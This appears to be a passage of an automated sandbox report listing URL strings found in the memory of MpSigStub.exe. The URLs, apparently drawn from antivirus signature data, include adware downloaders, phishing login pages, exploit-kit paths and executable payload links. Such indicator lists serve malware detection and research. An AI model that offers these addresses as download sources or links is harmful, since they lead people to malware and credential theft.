Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://down.namepics.info/install.php?name=
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://down2.uc.cn/pcbrowser/down.php?pid=4396
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: http://download-n-save.com
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://download-the-files.com/tplc/cdc
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: http://download.%s.com%s&u=%u&advid=00000000&p=%u
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://download.%s.com/
Source: MpSigStub.exe, 00000026.00000003.18307265419.00000138BE9EC000.00000004.00000001.sdmp	String found in binary or memory: http://download.%s.com/124.php?&advid=00000
Source: MpSigStub.exe, 00000026.00000003.18307265419.00000138BE9EC000.00000004.00000001.sdmp	String found in binary or memory: http://download.%s.com/madownload.php?&advid=00000000&u=%u&p=%u&lang=______
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://download.3721.com/download/CnsMinExM.ini
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://download.3721.com/download/CnsMinUp
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://download.contextplus.net/shared/Msvcp60Installer.exe
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://download.cpudln.com
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	String found in binary or memory: http://download.driverupdate.net/DriverUpdate-setup.msi.bz2x
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://download.enativ.com/nativ_v4.exe
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://download.enet.com.cn/search.php?keyword=%s
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://download.kaobeitu.com/kaobeitu/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://download.m
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://download.phpnuke.org/installers/extra_software/coupish/coupish-x
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://download.powercreator
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://download.seznam.cz/update
Source: MpSigStub.exe, 00000026.00000003.18307265419.00000138BE9EC000.00000004.00000001.sdmp	String found in binary or memory: http://download.spy-shredder.com/ssdownload.php?&advid=00001322&u=%u&p=%u&lang=________&vs=%u&%s
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://download.websearch.com/Dnl/T_
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://download.websearch.com/Tb
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://download.websearch.com/dnl/T
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://download.zhongsou.com/cdsearch/
Source: MpSigStub.exe, 00000026.00000003.18301813906.00000138BCBCB000.00000004.00000001.sdmp	String found in binary or memory: http://download.zhongsou.com/msstat/dealip.asp?aa=%s&bb=%s&cc=%s&dd=%s&ee=%d&ff=%ld&gg=%
Source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp	String found in binary or memory: http://download.zhongsou.com/routeway/dealsetup.asp?aa=%s&bb=%s&cc=%s&dd=%s
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://download.zjsyawqj.cn/jjbq/setup_jjbq_jjbq03nodkpk_v1.0_silent.exe
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://download1.microliteupdate.net/
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://download2.mybrowserbar.com/kits/hlp/exthelper.exe
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://downloader.aldtop.com
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://downloadfile.xyz/mine/run.js
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://downloadfilesldr.com/allfile.jpg
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://downloadfilesldr.com/index2.php?adv=141
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://downloadfilesldr.com/index3.php?adv=141
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://downloadfilesldr.com/index4.php?adv=141
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://downloadfilesldr.com/index5.php?adv=141
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://downloads.180solutions.com/
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	String found in binary or memory: http://downza.cn
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://dqbdesign.com/wp-admin/cu_sa/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://dr-woelfl.de/invoice-for-you/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://driversearch.space
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://drm.ysbweb.com/v1.aspx?id=65181__asf_license_url_ends_here__
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: http://dropboxservices.isaihost.com/dropbox/drop/dropbox.html)
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://drpuneetchawla.com/cli/adbe/login.html
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	String found in binary or memory: http://dtrack.secdls.com
Source: MpSigStub.exe, 00000026.00000003.18348332135.00000138BE958000.00000004.00000001.sdmp	String found in binary or memory: http://dudethisishowwedoitallnightlong.2myip.net
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://duhjhv.ftp1.biz/ip/stat.php
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://dvd2ipad.net/media2
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://dw.mtsou.com/
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://dw.mtsou.com/_
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://dx.mastacash.com
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://dz-site.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://e223pg.awardspace.co.uk/up.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://eastman.smritiphotography.in/#ywhvzgdlc0blyxn0bwfulmnvbq==
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://ebsuggester.com/redirect-new-logon-alert/redirect.htm
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: http://economycrown.com/hahdhdhd/sf-express.php?email=
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://eda.ru/data
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://eduardovolpi.com.br/flipbook/postal/services/parcel)
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://educadorfisicoadinis.com.br/ryan/login%20pdf.html)/type/action/s/uri
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://efficientlifechurch.com/.well-known/pki-validation/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://ekey.sdo.com
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://eleonorepack.cn/myexp/getexe.php?spl=javadmjava/io/bufferedoutputstreamjava/io/fileoutputstre
Source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp	String found in binary or memory: http://elsword.com/xb
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://employeeportal.net-login.com/
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: http://en.aa.com
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://en.eazel.com/
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://en.v9.com/
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://en.v9.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	String found in binary or memory: http://endresactuarial.com/
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	String found in binary or memory: http://engine.dmccint.com/common/ProcessDump.exe?v=1.0.3.0x
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://ermi.co.zw/ds/2312.gif
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://errors.crossrider.com/utility.gif
Source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp	String found in binary or memory: http://errors.statsmyapp.com
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://errors.statsmyapp.com/installer-error.gif?action=wrapper
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://errors.statsmyapp.com/installer-error.gif?action=wrapperxk
Source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp	String found in binary or memory: http://errors.statsmyapp.comxa
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://escritorioharpia.com/wp-content/upgrade/resume.php?id=
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://esiglass.it/glassclass/glass.php
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://esmxc01.top/download.php?file=lv.exe
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://esp1k.myddns.me/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://estelaraziel.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	String found in binary or memory: http://etzhb.000webhostapp.com/read.txt
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://eula.mindspark.com
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://evanstechnology.com
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: http://events.bittorrent.com/startConversion
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://everbot.pl/cs/reg.php?id=
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://ewd96h2.sed.macabrepoe.com
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://excelvba.ru/updates/download.php?addin=Parser
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://exe-1.icu/install2.exe
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://expandingdelegation.top/
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://experimental.sitesled.com/wind.jpg
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://explorehere.in/info/new-invoice-
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://f0568929.xsph.ru/po/rexifly.php?
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://f0570495.xsph.ru/files/pdf.php
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://f1visa.info/cd/cd.php?id=%s&ver=g
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://faacebookv.tk/reveal.php
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://facebegen.com/dexport/ajax.php
Source: MpSigStub.exe, 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp	String found in binary or memory: http://faisdodo.info/sbuild1.exe
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://faithhotelghana.com
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://fantastico.globo.com/jornalismo/fant/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://fateh.aba.ae/abc.zip
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://fateh.aba.ae/xyzx.zip
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://fbcores.info/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://feed.helperbar.com
Source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp	String found in binary or memory: http://fei-coder.com/
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://fen0men.info/exp/index.php
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://festival23234.com/flash.php?mode=1
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://fgrss.com/?referrer=c3rob3jhdeblyxn0bwfulmnvbq==
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://fhayazilim.com/wp-admin/
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://fibrassolpiscinas.com.br/wp-content/upgrabe/
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://file.sidetab.co.kr/dst/WallTab_
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://files.getpricefinder.com/install/ie/pricefinderpackage.zip
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	String found in binary or memory: http://finance.yahoo.com/
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://finanzen-netto.de
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://find.verycd.com/folders?cat=movie&kw=%s
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://fineartconsult.be/gallery/index.php?email=
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://firefoxstabs.com/
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://fixdoctorsfirst.net/registry/andyfkz.png?bg=sp14
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://flash.chinaren.com/ip/ip.php
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://flashupd.com/mp3/in
Source: MpSigStub.exe, 00000026.00000003.18311122933.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://fmforums.com/wggx991264/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://foo.w97.cn/SoftInterFace/SearchNum.aspx
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://foo.w97.cn/data/file/kwbuf.ini
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://forkasimov.hopto.org/beau/updates.html/f
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://forkasimov.hopto.org/pursue/updates.html/f
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://forms.newlifeadmin.org
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://foundation.shanto-mariamfoundation.org/24.gif
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://foxxpriv.ru/pic1/index.php
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://foxy.divarug.com:8080/yahoo.js
Source: MpSigStub.exe, 00000026.00000003.18292462058.00000138BDF8A000.00000004.00000001.sdmp	String found in binary or memory: http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://frame.crazywinnings.com/scripts/protect.php?promo
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	String found in binary or memory: http://freeimagehost.ru/ubanner.png
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://freevideoz.info/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://fu.o3sb.com:9999/img.jpg
Source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	String found in binary or memory: http://funsiteshere.com/
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	String found in binary or memory: http://funsiteshere.com/redir.php
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://futebolclubesantacruz.com.br/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://futureweighed.ae.am/showthread.php?t=731756
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: http://g.delyemo.ru
Source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp	String found in binary or memory: http://g1.globo.com/Noticias/SaoPaulo/0
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://gaigoixxx.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://galinasergeeva.ru
Source: MpSigStub.exe, 00000026.00000003.18348616803.00000138BCC0C000.00000004.00000001.sdmp	String found in binary or memory: http://galleries.payserve.com/1/31952/1
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://gallerydating.net
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://games.enet.com.cn/article/SearchCategory.php?key=%s
Source: MpSigStub.exe, 00000026.00000003.18350786721.00000138BD66E000.00000004.00000001.sdmp	String found in binary or memory: http://gathome.com/cgi-bin/first.pl
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://gd-sirve.com/rb.txt
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://gdcbmuveqjsli57x.onion/b93cf40ee63ed066
Source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp	String found in binary or memory: http://ge.tt/api/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://geezybeatz.com/secured/index.html)
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://geocities.com/jobreee/main.htm
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://geocities.yahoo.com.br/youtoba03/listaaut.jpg
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://geros.freedynamicdns.org/bin/key.html/f
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://get.file136desktop.info/DownloadManager/Get?p=638x
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://getfreez.net/multi-codec-pack.php
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://getp.jujutang.com
Source: MpSigStub.exe, 00000026.00000003.18301813906.00000138BCBCB000.00000004.00000001.sdmp	String found in binary or memory: http://getsyncer5.info/sync/?ext=bcool&pid=26&country=us
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://getvolkerdns.co.cc/priv8
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://getwebcake.com/Privacy
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://getyouneed.co
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://getyouneed.coa
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://getyouneed.com
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://getyouneed.com/r.php?wm=5
Source: MpSigStub.exe, 00000026.00000003.18348332135.00000138BE958000.00000004.00000001.sdmp	String found in binary or memory: http://gg.pw
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: http://ghsinternationalconferencewithinternationalfilesecureserviceglo.ydns.eu
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://gicia.info/cd/cd.php?id=%s&ver=g
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://gkfaalkhnkqvgjntywc.ml/liverpool-fc-news/features/
Source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp	String found in binary or memory: http://globonoticia.iitalia.com/noticia.com
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	String found in binary or memory: http://go.58.com/?f=
Source: MpSigStub.exe, 00000026.00000003.18348332135.00000138BE958000.00000004.00000001.sdmp	String found in binary or memory: http://go.jetswap.com/ssflang.php?it=4893473
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://go.secureclick6.com/0534
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://gogglgdoc.com/document/review/index.html)
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://gogo.ru/go?x;
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://golden-toto.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/0ma6okopenhttp://goo.gl/0ma6okerror
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/9mrcts
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/bw14po
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/x7a4lcshowwebinpopuptaskkill-f-im
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://google-adsenc.com/in.cgi?
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://google.com
Source: MpSigStub.exe, 00000026.00000003.18309912138.00000138BE5E8000.00000004.00000001.sdmp	String found in binary or memory: http://google.com/
Source: MpSigStub.exe, 00000026.00000003.18309912138.00000138BE5E8000.00000004.00000001.sdmp	String found in binary or memory: http://google.com/ID
Source: MpSigStub.exe, 00000026.00000003.18326026778.00000138BCBB8000.00000004.00000001.sdmp	String found in binary or memory: http://google.com/install.php?time=%d
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: http://google.ru/js
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://gosgd.com
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://gosgd2.com
